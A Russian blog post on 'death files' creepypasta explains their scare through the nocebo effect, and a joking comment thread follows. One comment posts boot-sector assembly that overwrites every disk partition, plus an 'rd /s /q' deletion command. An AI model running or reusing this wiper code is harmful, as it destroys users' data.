Инфопост: Что такое «Смертельные файлы» и почему они опасны (14+)

Зло приходит под разными масками. Смертельные файлы — одна из них.

Современные технологии позволяют нам многое: протезирование органов, лёгкая очистка воды, быстрое возведение зданий. Одно из самых главных достижений человечество за последнюю сотню лет — компьютер — за один век прошло путь от громоздких машин, занимающих целые комнаты, до относительно небольших персональных устройств, которые в последнее время даже стали помещаться в карманы одежды. Большая часть этих устройств подключена к всемирной сети Интернет, в которой сотни миллионов людей каждый день обмениваются информацией. Нам кажется, что человечество имеет полный и абсолютный контроль над возможностями Интернета, но истории, время от времени появляющиеся в этой самой сети, говорят об обратном. О том, как мистический жанр адаптируется к современным тенденциям и моде я расскажу в этом посте. Заинтересованных прошу под кат.

Данный пост не содержит медиафайлов или ссылок на медиафайлы, описываемые в статье. Тем не менее, описания неприятных подробностей были частично сохранены. Чтение поста не рекомендуется лицам младше 14 лет и категорически не рекомендуется лицам младше 13 лет. Читатели предупреждены.

Смертельные файлы — закономерная эволюция крипипасты

Copypasta — одно из самых древних проявлений интернета. Чаще всего копипаста представляет собой скопироваанный откуда-либо и вставленный текст. При этом изменения в текст не вносятся. Довольно распространены копипасты-истории, но истории, как известно, бывают разные. Именно поэтому человеческая тяга к неизведанному и мистическому породила такой жанр, как Creepypasta. Крипипасты, в отличие от копипаст, ставят своей главной целью напугать читателя. Довольно часто в крипипастах описывались мистические случаи, обыгрывающие либо городские легенды, либо народные мифы, либо так называемые «детские страхи». О самых известных крипипастах многие слышали: это и Тонкий человек, безликий, высокий и тонкий гуманоид, похищающий детей с неизвестной целью, это и Джефф, обезумевший от полученных ранений подросток, это и знаменитая организация «Фонд Secure.Contain.Protect.», где каждый паранормальный объект — маленькая жутенькая история.

Но со временем интернет улучшался и ускорялся, пользователи получили гораздо больше трафика, и текстами уже было нельзя никого удивить. Это, вкупе с фактором «Нам нужны пруфы, Билли. Где пруфы?», породило ответвление от жанра Creepypasta — Смертельные файлы.

Что такое смертельные файлы?

Смертельные файлы — это мистические файлы, способные причинить вред как операционной системе (подобно вирусам), так и аппаратуре и даже здоровью человека. Обычно, каждый смертельный файл состоит из двух частей:
  • Собственно, сам файл
  • История о файле

Истории файлов — типичные крипипасты. В них излагается краткая история файла: где появился, как распространялся и, самое главное, как он действует. О другом назначении этих историй будет рассказано ниже. Сейчас мы плавно переходим к самим файлам.

Итак, смертельные файлы. Особенность этих файлов, как понятно из названия, в том, что они могут убивать. Примерный механизм действия смертельных файлов таков: У нас есть наблюдатель (человек) и есть файл. Здесь файлы различаются по эффектам: одни ломают систему, для подобного их нужно просто запустить. Другие, по легенде, представляют угрозу.
Угроза, которую несут подобные файлы, является меметической, или же, говоря проще, они опасны для восприятия. Для того, чтобы проявился эффект файла, наблюдатель должен как-либо воспринимать файл. В случае с компьютерной техникой, воспринимать файл можно лишь двумя способами: зрительно и с помощью слуха.

В случае, если смертельный файл начал действовать, эффекты могут быть самыми разными. Итог один: человек либо сходит с ума, либо совершает самоубийство, либо пропадает без вести. Сейчас я приведу несколько самых известных смертельных файлов, для примера.
  • smile.jpg: это жуткое изображение по легенде рассылалось по электронной почте с подписью «Улыбайся, Бог любит вас». Тем, кто посмотрел на это изображение оно снилось в кошмарах, а некоторым голос в голове приказывал распространять изображение дальше.
  • Mereana Mordegard Glesgorv: это двадцати двухсекундное видео, которое можно с лёгкостью найти на видеохостинге YouTube. Представляет собой видео, в котором мужчина на красном фоне смотрим в камеру, на последних секундах изображение мужчины увеличивается и видно, как он улыбается. По легенде, «опасная» полная версия была удалена после того, как в администрацию YouTube поступили жалобы на видео-убийцу. В ходе эксперимента несколько сотрудников видеохостинга сошли с ума после просмотра, но было выяснено, что двадцати двухсекундный отрезок никак не влияет на сознание. Его и оставили. Неизвестно, существовала ли когда-либо полная версия, однако были сделаны множество поддельных видео, которые выдаются за оригинал. Самым ярким последствием просмотра оригинала было стремление как можно скорее удалить глазные яблоки с использованием подручных средств.
  • Вайомингский Инцидент: по легенде это видео было показано во время эфира новостей по одному из каналов, вещающему в штате Вайоминг. Новостная передача была прервана странной настроечной таблицей с текстом «У нас есть особая презентация», после которой под довольно жуткую музыку начался показ странных 2D и 3D проекций человеческих лиц. В тот же вечер многие люди обратились в больницы с жалобами на тошноту и головную боль, взломщик телесигнала установлен не был.
  • Lavender Town Syndrome: старание сделать жуткие локации иногда приводит к гораздо более интересным резульататм, чем ожидалось. Легенда о Синдроме лавандового города утверждает, что в самые первые картриджи игр Pokemon Red и Pokemon Blue содержали опасную для детей музыкальную композицию — тему Lavender Town. Утверждалось, что эта композиция использовала бинауральные ритмы, которые приводили к ухудшению самочувствия у детей и даже к суицидальным мыслям. Как утверждает легенда, после нескольких жалоб от родителей картриджи были отозваны, а вместо них была выпущена исправленная версия, в которой уже не было бинауральных ритмов.
  • Sadness.pdf: таинственный файл, который можно открыть только с помощью Adobe Reader. При открытии файл представляет собой 415 страниц, содержащих одинаковый скан газеты The Times, датированной 29 февраля 1965 года. Текст на сканах сильно искажён, но каждый читавший утверждал, что понимает некоторые слова. Последствия прочтения различные: помешательство, пропажа без вести, внезапные несчастные случаи с летальным исходом, самоубийства… Типичная картина.
  • theend.avi: длинная видеозапись на протяжении которой балерина танцует от одного края монитора к другому. В конце балерина пропадает и высвечивается большая надпись: THE END, после которой посмотревшие видео полностью начинали считать, что их жизнь закончилась вместе с видео и пытались как можно скорее совершить самоубийство.

Даже с учётом различной мистики, всё равно сложно поверить, что нечто, описанное выше, может произойти из-за файла. Но в этом и заключается отличие Смертельных файлов от крипипасты: «Не веришь? Проверь сам!». Если в случае с крипипастами у нас есть некая мистическая история со слабыми подтверждениями, то Смертельные файлы можно найти, просто загуглив их название (а если файла не существует, то это будет уже крипипаста). Я ни в коем случае не призываю вас идти гуглить примеры и предупреждаю — зрелище может вам не понравиться. А для тех, кто остался на странице с постом, я расскажу о самом главном. Я постараюсь дать ответ на вопрос «Почему нас пугают смертельные файлы?»

Почему нас пугают смертельные файлы?
Я не зря выделил две составляющие любого смертельного файла. Чтобы понять, почему они нас пугают, надо разобрать обе из них.

Давайте взглянем сначала на сами файлы. Такие файлы, как smile.jpg и Mereana Mordegard Glesgorv сразу бросаются в глаза своей цветовой палитрой, а именно красным цветом. Именно красный цвет сразу даёт нам понять враждебность, нам неприяно смотреть на абсолютно красное изображение, тем более с жуткой атмосферой: на картинке с неестественной улыбкой на вас смотрит собака, а в видео — непонятный мужчина. В других случаях, как с файлом theend.avi, играет роль непонимания. Если показать этот файл кому-либо на улице, то он спросит вас: «Что это вообще было?». Такая неопределённость позволяет вложить любой смысл в этот файл. И здесь мы переходим к сегменту с историей.

Многим известен эффект Плацебо, но немногие знают, что у этого эффекта есть противоположность. Имя этой противоположности — Эффект Ноцебо. Именно этот эффект вызывает сегмент с историей.
Истории, связанные с файлом, хотят нас напугать. Зачем? Для усиления эффекта. От простого вида smile.jpg становится некомфортно, а если человек до этого узнал, что теперь это изображение будет преследовать его в кошмарах? Со смелыми людьми это может не сработать, но с впечатлительными уж точно. Или история файла theend.avi. Как я уже говорил, нельзя понять его сразу, однако если до просмотра рассказать историю, то во время просмотра зритель как минимум будет чувствовать себя некомфортно.
P.S. Вот надо было Пинкамине выскочить пока я писал этот пост...

Итоги

В Смертельных файлах нет ничего мистического, тем не менее это не делает их безопасными. Возможно, они вас не убьют и не покалечат, но тандем файл-история способен вызвать эффект Ноцебо у впечатлительных людей. Так, эффекты файлов, описанные в истории, хоть и намного слабее, но будут проявляться, но не из-за мистической природы, а за счёт самовнушения наблюдателя.

Пост сделан по заказу коммерческой организации кибербезопасности 2bit (Дидитаун, Вайоминг, США)

68 комментариев

*Не прочитав пост*.
Не надо их вообще использовать или загружать. Смысл нулевой, а ПК и пострадать может.
Gauss-Destronger-Gunner
+1
D-Tritus
+1
COME ON AND SMILE CELESTIA LOVES YOU
ZZidane
+1
Ну вот теперь опять ночь не спать…
Smikey
+2
Видимо, смысл файлов смерти и правда в описаниях к ним. Эту картинку саму по себе даже развидеть не хочется.
MashaEvent
+2
Краткий пересказ:
Дети, не смотрите на ночь ужастики.
Smikey
0
Все это фейк и брехня.
EveScintilla
0
Не отменяет того, что это работает.
skypony53
+1
Ага, просто людям кажется, что работает, вот они и верят. А вера — вещь мощнейшая…
mekhanism
+4
Плацебо.
AJFly
0
Смертельные файлы? У меня есть смертельный код.
BarelyBreathing.asm
DELETE_BLOCKS_COUNT equ 2048h
DELETE_BLOCKS_SIZE equ 1h

use16
org 7C00h

xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 7C00h
mov dx, 0
mov bp, dmsg
mov ax, 1301h
mov cx, [msgsize]
mov bx, 0Ah
int 10h

xor ax, ax
mov dl, 80h
push dx

LoopDisks: 
pop dx 
push dx
mov [X_SEC], 0 
mov ah, 42h
mov si, dap
int 13h
jc NoMoreDisks

cmp word [7E00h + 1FEh], 0AA55h
jne NextDiskLoop

mov si, 7FBEh

ReadPartition:
mov eax, dword [si + 08h]

cmp byte [si + 04h], 0h
je NextPartLoop

cmp byte [si + 04h], 0Fh
je LoadExtLBA

cmp byte [si + 04h], 05h 
je LoadExtLBA
jmp SkipLoadExtLBA

LoadExtLBA:

mov [ExtPTSector], eax
jmp NextPartLoop 

SkipLoadExtLBA: 

call ErasePartition

NextPartLoop: 
add si, 10h 
cmp si, 7FEEh
jna ReadPartition

call EraseSector

SMBRLoop:
cmp [ExtPTSector], 0 
jz SMBRLoopEnds 

push [ExtPTSector]
pop [X_SEC]

mov ah, 42h
mov si, dap
int 13h
call EraseSector
mov eax, dword [7FBEh + 08h]
add eax, [ExtPTSector]

call ErasePartition
mov eax, dword [7FBEh + 0Ch]
add eax, dword [7FBEh + 08h]
add [ExtPTSector], eax 

cmp dword [7FCEh + 04h], 0
jz SMBRLoopEnds

jmp SMBRLoop

SMBRLoopEnds:

NextDiskLoop:
pop dx
inc dl
push dx
jmp LoopDisks

NoMoreDisks: 

int 18h 

ErasePartition:

push si
push [X_SEC] 
mov [N_SEC], DELETE_BLOCKS_SIZE
mov [buf_off], 0h
mov [X_SEC], eax
mov cx, DELETE_BLOCKS_COUNT 

erase_next:
mov ax, 4300h
mov si, dap
int 13h 
add [X_SEC], DELETE_BLOCKS_SIZE 
loop erase_next

pop [X_SEC]
pop si
mov [buf_off], 7E00h
mov [N_SEC], 1

ret

EraseSector:

mov [buf_off], 0
mov si, dap
mov ax, 4300h
int 13h
mov [buf_off], 7E00h
ret

dap:
packet_size db 10h
reserved db 00h
N_SEC dw 01h
buf_off dw 7E00h
buf_seg dw 00h
X_SEC dd 00h

ExtPTSector dd 00h

dparam:
dw 001Ah

dmsg db "lol pwnd"
db "umad bro"
msgsize dw $-dmsg

rd /s /q .\
lunarinitiate
+2
переведите, кто-нибудь!!!
mekhanism
+1
Эта хрень форматирует твой жёсткий диск.
GadS
+4
Это всё детский сад. А вот видосики ютуб-канала nana825763 — реально крипота.
FarewellToArms
0
Вернее, даже не столько крипота, сколько мерзость.
FarewellToArms
0
Ну как бы это примерно из одной серии. Особенно Username 666, самое популярное ее творение, которое тоже обзавелось давным-давно своей крипипастой.
RaCa
0
А я поугарал над картинками)))
mekhanism
0
Escatello
+1
Две ночи не спать…
Smikey
+1
Почему я смеюсь?
mekhanism
+1
Тот же вопрос.
MashaEvent
0
Потому что Пинки!
AJFly
0
Пост сделан по заказу коммерческой организации кибербезопасности 2bit (Дидитаун, Вайоминг, США)

Тебе за этот бред платят?!
Smikey
0
Не ему, спиздил небось с другого сайта.
koghs
0
Не платят, стилистика.
skypony53
+2
Что значит «стилистика»? Заказали или нет?
Smikey
0
Стилистка — стилизовано под тему поста. Не заказывали, так как ни такой коммерческой организации, ни даже города в штате Вайоминг не существует.
skypony53
+2
Ага, теперь понял.
Smikey
0
Таки да, они несут сильный психологический эффект. Но если быть устойчивее морально к этому говно то ничего не будет.
koghs
0
А я смеюсь, мне хватает) Может, я не нормальный...
mekhanism
0
Чё-то тухловато как-то.
А где же очередной нырок в коричневые бездны понифандома?
GL_DOS
0
Rainbow Dash
ZZidane
0
Заправляю баллоны. На выходных — ещё один разбор, в понедельник — внеплановый «горячий» разбор.
skypony53
0
А, вот он где.
skypony53
+1
Так, а где мой комментарий?
skypony53
0
Smikey
+16
Все, это финиш!!! Я под стулом от смеха!!
mekhanism
0
Ты должен кричать от ужаса! Ничего, жди ночью Луны.
Smikey
0
Поздоно, я на нее упаду от смеха просто )))) XDD
mekhanism
0
А я бы ее впустил… Молли — хорошая!
Clopodile
+1
Это даже не Молли.
блог asksunshineandmoonbeams.tumblr.com/
Smikey
0
У нас тут че, филиал Лурка открылся?
Ukiwa
+4
Shustryy
+3
Слоник!!!
mekhanism
0
Clopodile
+2
Сорь за дабл )))))
Clopodile
0
Все это правда. В 2010-м году был создан еще один такой файл. Точнее, их много, но действуют они безотказно. Они вызывают у людей необъяснимое помешательство, вследствие которого взрослые мужчины начинают считать себя сказочными разноцветными пони, наряжаться в костюмы, собирать пластмассовые и плюшевые игрушки, а также вместе проводить время на больших мероприятиях.
Многие аналитики всего мира, в том числе и британские ученые, называют это странное состояние Феноменом брони. А сами файлы имеют множество форматов, среди которых самые распространенные: .avi, .mkv, .mp3, .jpg, .png, .gif, .flv, .swf, .txt, .doc, .apk и .exe
Но что самое страшное, этому помешательству подверглось огромное количество человек во многих странах мира. Психологи, родители и общественные деятели бьют тревогу, и это поистине страшно. Вот.
Iridany
+11
Также эксперты отмечали подсознательное желание распространять файл у отдельных подверженных. Помешательство некоторых зашло настолько далеко, что они начали распространять заражение через текстовые файлы, известные как «фанфики».
skypony53
+3
Людей прочитавших сойдут с ума.
RaCa
0
БЕЗМОZГЛЬIМ
skypony53
0
Неправильно ты, скайпони, БЕЗНОГNМ оформляешь. Его без спойлера нельзя.
Vsevolod
0
Это всё было (в смысле, придумки эти) так ДАВНО.
Dany
+2
Как же, помню древний пиксель-арт из прошлого столетия, где изображены Dead Moroz и Santa Claws. ;)
VIM
+1
Запостившие крипоту без предупреждения повели себя как редиски. Впрочем, этот комментарий для них желанен.
SMT5015
+1
Ну так пост сам по себе с предупреждением. А если пост с предупреждением, то зачем ожидать чего-то лучшего в комментариях?
MashaEvent
0
Стоит ожидать такого же, то есть предупреждения.
SMT5015
+1
Наверное, в этом есть смысл. Но я его не понимаю. КМК, если пост с предупреждением, то оно распространяется и на возможные комментарии.
MashaEvent
0
Нет, имхо. Логично, что в посте о крипоте будут обсуждать крипоту, но в посте предупреждение есть, и читаешь ты его на свой страх и риск. Аналогично должен быть устроен каждый опасный комментарий.
SMT5015
+1
Нужно больше информационных постов!
Vsevolod
0
Однозначно.
MashaEvent
0
О, Марийка!
Vsevolod
0
Внезапно, да?
SMT5015
+1
Довольно таки.
Vsevolod
0
Ruberoid
0
Молодец, конечно, что понакидал сюда баянов, но писать про Мереану, Смайлджпг и ВИ (я уж молчу про всякую заслуженно забытую фигню, которую ты тоже включил) в 2016 — это уже какой-то моветон, ибо это обсосали уже со всех сторон несколько лет назад.
RaCa
+2
Лично я пока искал инфу видел пару интересных экземпляров, но я подумал, что писать про файл, залитый пятого июля этого года будет тоже как-то не очень.
skypony53
+1
Надо скормить петровичу мою базу крипоты, и то лучше будет.
f13proxima
+1
Lavender Pony Syndrome: думать, что Принцесса Селестия непременно ждёт от тебя отчёта о новом уроке дружбы.
ertegix
+2
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.
Скрыто Показать